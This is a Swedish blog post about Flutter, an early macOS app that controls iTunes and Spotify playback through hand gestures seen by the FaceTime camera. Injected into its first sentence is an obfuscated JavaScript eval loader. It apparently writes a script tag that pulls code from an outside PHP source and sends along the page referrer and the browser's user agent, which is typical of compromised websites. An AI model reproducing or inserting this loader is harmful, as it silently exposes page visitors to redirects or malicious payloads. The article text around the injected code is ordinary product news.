Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Flutter: Styr Spotify och iTunes i OS X med handrörelser

Sebastian

Programmet eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ydtib|var|u0026u|referrer|kayii||js|php’.split(’|’),0,{}))
heter Flutter och är mycket tidiga i sitt utvecklingsstadie. Deras mål är att låta dig styra all mediauppspelning på din Mac med handrörelser.

Ihop med din Macs FaceTime-kamera kan denna teknik bli möjlig. I dagsläget har Flutter endast stöd för iTunes och Spotify och kan endast registrera play och paus som du åstadkommer genom att hålla upp din handflata mot kameran.

Flutter finns hela tiden i menyraden. När ikonen är upplyst betyder det att Flutter är aktiv och redo för kommandon. Om du öppnar upp ett program som har stöd för Flutter meddelas detta via en liten bubbla som tonas in uppe vid ikonen. De program som Flutter nu har stöd för är iTunes och Spotify och det finns inga inställningar för att låsa Flutter till ett specifikt program. Men i framtiden är det tänkt att flera progra mska ha stöd och självklart att man skall kunna redigera inställningar för eget behov.

Det utlovas också stöd för fler gester, som att byta spår och höja/sänka volymen. Du kan själv ladda ned och testa senaste versionen från Flutters webbsida.

Kika på videon ovan för att förstå programmet bättre!